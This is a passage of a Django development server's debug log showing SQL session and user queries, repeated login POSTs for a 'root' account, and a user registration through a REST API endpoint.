'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-28 14:22:15,980 utils 18694 139696059688704 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'root'; args=('root',) DEBUG 2019-11-28 14:22:16,235 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:22:16.233107+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 22, 16, 233107, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 14:22:16] "POST /login/?next=/ HTTP/1.0" 200 1946 DEBUG 2019-11-28 14:22:25,245 utils 18694 139696059688704 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:22:25.230937+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 14, 22, 25, 230937, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-28 14:22:25,252 utils 18694 139696059688704 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'root'; args=('root',) DEBUG 2019-11-28 14:22:25,498 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:22:25.496350+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 22, 25, 496350, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 14:22:25] "POST /login/?next=/ HTTP/1.0" 200 1946 DEBUG 2019-11-28 14:24:07,746 utils 18694 139696059688704 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:24:07.732508+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 28, 14, 24, 7, 732508, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [28/Nov/2019 14:24:07] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 14:24:08,079 utils 18694 139696059688704 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:24:08.067956+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 28, 14, 24, 8, 67956, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-28 14:24:08,117 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:24:08.114360+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 24, 8, 114360, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [28/Nov/2019 14:24:08] "GET /login/?next=/ HTTP/1.0" 200 1786 [28/Nov/2019 14:24:40] "GET / HTTP/1.0" 302 0 [28/Nov/2019 14:25:07] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 14:28:05,038 utils 18694 139696059688704 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:28:05.023367+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 14, 28, 5, 23367, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-28 14:28:05,045 utils 18694 139696059688704 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'root'; args=('root',) DEBUG 2019-11-28 14:28:05,377 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:28:05.375578+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 28, 5, 375578, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 14:28:05] "POST /login/?next=/ HTTP/1.0" 200 1946 DEBUG 2019-11-28 14:29:15,825 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:29:15.816106+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 14, 29, 15, 816106, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-28 14:29:15,829 utils 18694 139696059688704 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'root'; args=('root',) DEBUG 2019-11-28 14:29:16,080 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:29:16.078305+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 29, 16, 78305, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 14:29:16] "POST /login/?next=/ HTTP/1.0" 200 1946 [28/Nov/2019 14:30:11] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 14:33:05,408 utils 18694 139696059688704 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:33:05.394445+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 28, 14, 33, 5, 394445, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-28 14:33:05,464 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:33:05.461818+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 33, 5, 461818, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') Method Not Allowed: /api/register [28/Nov/2019 14:33:05] "GET /api/register HTTP/1.0" 405 5703 [28/Nov/2019 14:33:05] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.0" 200 121457 [28/Nov/2019 14:33:05] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.0" 200 3385 [28/Nov/2019 14:33:05] "GET /static/rest_framework/css/prettify.css HTTP/1.0" 200 817 [28/Nov/2019 14:33:06] "GET /static/rest_framework/css/default.css HTTP/1.0" 200 1131 [28/Nov/2019 14:33:06] "GET /static/rest_framework/js/ajax-form.js HTTP/1.0" 200 3597 [28/Nov/2019 14:33:06] "GET /static/rest_framework/js/jquery-3.4.1.min.js HTTP/1.0" 200 88145 [28/Nov/2019 14:33:06] "GET /static/rest_framework/js/csrf.js HTTP/1.0" 200 1719 [28/Nov/2019 14:33:06] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.0" 200 37608 [28/Nov/2019 14:33:06] "GET /static/rest_framework/js/prettify-min.js HTTP/1.0" 200 13632 [28/Nov/2019 14:33:06] "GET /static/rest_framework/js/default.js HTTP/1.0" 200 1268 [28/Nov/2019 14:33:07] "GET /static/rest_framework/img/grid.png HTTP/1.0" 200 1458 DEBUG 2019-11-28 14:34:45,054 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:34:45.045444+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 14, 34, 45, 45444, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-28 14:34:45,058 utils 18694 139696059688704 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'root'; args=('root',) DEBUG 2019-11-28 14:34:45,343 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:34:45.341522+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 34, 45, 341522, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 14:34:45] "POST /login/?next=/ HTTP/1.0" 200 1946 DEBUG 2019-11-28 14:35:00,651 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:35:00.640437+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 14, 35, 0, 640437, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-28 14:35:00,656 utils 18694 139696059688704 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'root'; args=('root',) DEBUG 2019-11-28 14:35:00,981 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:35:00.979270+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 35, 0, 979270, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 14:35:00] "POST /login/?next=/ HTTP/1.0" 200 1946 [28/Nov/2019 14:35:20] "GET / HTTP/1.0" 302 0 [28/Nov/2019 14:35:32] "GET / HTTP/1.0" 302 0 [28/Nov/2019 14:37:14] "OPTIONS /api/register HTTP/1.0" 200 187 [28/Nov/2019 14:39:57] "OPTIONS /api/register HTTP/1.0" 200 187 [28/Nov/2019 14:40:24] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 14:40:58,509 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:40:58.499975+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 14, 40, 58, 499975, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-28 14:40:58,513 utils 18694 139696059688704 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'root'; args=('root',) DEBUG 2019-11-28 14:40:58,752 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:40:58.750486+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 40, 58, 750486, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 14:40:58] "POST /login/?next=/ HTTP/1.0" 200 1946 DEBUG 2019-11-28 14:41:05,339 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:41:05.330756+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 14, 41, 5, 330756, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-28 14:41:05,342 utils 18694 139696059688704 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."username" = 'root'; args=('root',) DEBUG 2019-11-28 14:41:05,581 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:41:05.579016+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 41, 5, 579016, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 14:41:05] "POST /login/?next=/ HTTP/1.0" 200 1946 DEBUG 2019-11-28 14:41:46,611 utils 18694 139696059688704 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:41:46.599048+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 28, 14, 41, 46, 599048, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-28 14:41:46,666 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:41:46.663587+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 41, 46, 663587, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') Bad Request: /api/register [28/Nov/2019 14:41:46] "POST /api/register HTTP/1.0" 400 5754 DEBUG 2019-11-28 14:44:17,805 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:44:17.796231+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 28, 14, 44, 17, 796231, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-28 14:44:17,837 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:44:17.835436+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 44, 17, 835436, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') Bad Request: /api/register [28/Nov/2019 14:44:17] "POST /api/register HTTP/1.0" 400 5754 DEBUG 2019-11-28 14:44:41,763 utils 18694 139696059688704 (0.003) SELECT (1) AS "a" FROM "auth_user" WHERE "auth_user"."username" = 'foobar123' LIMIT 1; args=('foobar123',) DEBUG 2019-11-28 14:44:41,765 utils 18694 139696059688704 (0.000) SELECT (1) AS "a" FROM "auth_user" WHERE "auth_user"."email" = 'foobar123@example.com' LIMIT 1; args=('foobar123@example.com',) DEBUG 2019-11-28 14:44:42,048 utils 18694 139696059688704 (0.003) INSERT INTO "auth_user" ("password", "last_login", "is_superuser", "username", "first_name", "last_name", "email", "is_staff", "is_active", "date_joined") VALUES ('pbkdf2_sha256$150000$U4d8HpoYRWkS$fDJTq7evNvKdPXCf/6Gc8wnea4gLNNs+ZQCy27m05Eg=', NULL, false, 'foobar123', '', '', 'foobar123@example.com', false, true, '2019-11-28T14:44:41.776027+00:00'::timestamptz) RETURNING "auth_user"."id"; args=('pbkdf2_sha256$150000$U4d8HpoYRWkS$fDJTq7evNvKdPXCf/6Gc8wnea4gLNNs+ZQCy27m05Eg=', None, False, 'foobar123', '', '', 'foobar123@example.com', False, True, datetime.datetime(2019, 11, 28, 14, 44, 41, 776027, tzinfo=)) DEBUG 2019-11-28 14:44:42,066 utils 18694 139696059688704 (0.004) INSERT INTO "authtoken_token" ("key", "user_id", "created") VALUES ('2afb027f9440a09316acdbd747d97c6b4bd3b1d7', 1, '2019-11-28T14:44:42.062746+00:00'::timestamptz); args=('2afb027f9440a09316acdbd747d97c6b4bd3b1d7', 1, datetime.datetime(2019, 11, 28, 14, 44, 42, 62746, tzinfo=)) DEBUG 2019-11-28 14:44:42,075 utils 18694 139696059688704 (0.001) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T14:44:42.073261+00:00'::timestamptz AND "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'); args=(datetime.datetime(2019, 11, 28, 14, 44, 42, 73261, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') DEBUG 2019-11-28 14:44:42,106 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T14:44:42.104715+00:00'::timestamptz WHERE "django_session"."session_key" = 'rzwvbkeshzbhujlqsc3hq0crzngpypvg'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 44, 42, 104715, tzinfo=), 'rzwvbkeshzbhujlqsc3hq0crzngpypvg') [28/Nov/2019 14:44:42] "POST /api/register HTTP/1.0" 201 5868 [28/Nov/2019 14:45:29] "GET / HTTP/1.0" 302 0 [28/Nov/2019 14:46:13] "GET / HTTP/1.0" 302 0 [28/Nov/2019 14:46:14] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 14:46:14,090 utils 18694 139696059688704 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'p6crneu508unx911ndfhys80okzewvai' LIMIT 1; args=('p6crneu508unx911ndfhys80okzewvai',) DEBUG 2019-11-28 14:46:14,092 utils 18694 139696059688704 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('p6crneu508unx911ndfhys80okzewvai', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-12T14:46:14.090921+00:00'::timestamptz); args=('p6crneu508unx911ndfhys80okzewvai', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 46, 14, 90921, tzinfo=)) [28/Nov/2019 14:46:14] "GET /login/?next=/ HTTP/1.0" 200 1786 [28/Nov/2019 14:46:14] "GET /login HTTP/1.0" 301 0 [28/Nov/2019 14:46:14] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [28/Nov/2019 14:46:15] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [28/Nov/2019 14:46:15] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [28/Nov/2019 14:46:17] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [28/Nov/2019 14:46:18] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [28/Nov/2019 14:46:18] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 Not Found: /favicon.ico [28/Nov/2019 14:46:18] "GET /favicon.ico HTTP/1.0" 404 6411 [28/Nov/2019 14:46:18] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [28/Nov/2019 14:46:19] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [28/Nov/2019 14:46:28] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 14:46:31,099 utils 18694 139696059688704 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'xvnjkt2fz6ziko74ug1fraze0va7w3nb' LIMIT 1; args=('xvnjkt2fz6ziko74ug1fraze0va7w3nb',) DEBUG 2019-11-28 14:46:31,100 utils 18694 139696059688704 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('xvnjkt2fz6ziko74ug1fraze0va7w3nb', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-12T14:46:31.099626+00:00'::timestamptz); args=('xvnjkt2fz6ziko74ug1fraze0va7w3nb', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 14, 46, 31, 99626, tzinfo=)) [28/Nov/2019 14:46:31] "GET /login/?next=/ HTTP/1.0" 200 1786 [28/Nov/2019 14:50:37] "GET / HTTP/1.0" 302 0 [28/Nov/2019 14:55:15] "GET / HTTP/1.0" 302 0 [28/Nov/2019 14:55:43] "GET / HTTP/1.0" 302 0 [28/Nov/2019 15:00:20] "OPTIONS /api/register HTTP/1.0" 200 187 [28/Nov/2019 15:00:50] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 15:04:05,512 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T15:04:05.502274+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 15, 4, 5, 502274, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 15:04:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 15:04:05,949 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T15:04:05.940292+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 15, 4, 5, 940292, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 15:04:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-28 15:04:06,016 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T15:04:06.007362+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 15, 4, 6, 7362, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-28 15:04:06,064 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T15:04:06.061379+00:00'::timestamptz WHERE "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'; args=('OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 12, 15, 4, 6, 61379, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') [28/Nov/2019 15:04:06] "GET /login/?next=/ HTTP/1.0" 200 1786 DEBUG 2019-11-28 15:04:06,351 utils 18694 139696059688704 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-11-28T15:04:06.342394+00:00'::timestamptz AND "django_session"."session_key" = 'jk4izkus8ndogt7adrfvz69jqgeqx6jc'); args=(datetime.datetime(2019, 11, 28, 15, 4, 6, 342394, tzinfo=), 'jk4izkus8ndogt7adrfvz69jqgeqx6jc') DEBUG 2019-11-28 15:04:06,385 utils 18694 139696059688704 (0.001) UPDATE "django_session" SET "session_data" = 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', "expire_date" = '2019-12-12T15:04:06.383600+00:00'::timestamptz WHERE "django_session"."session_key" = 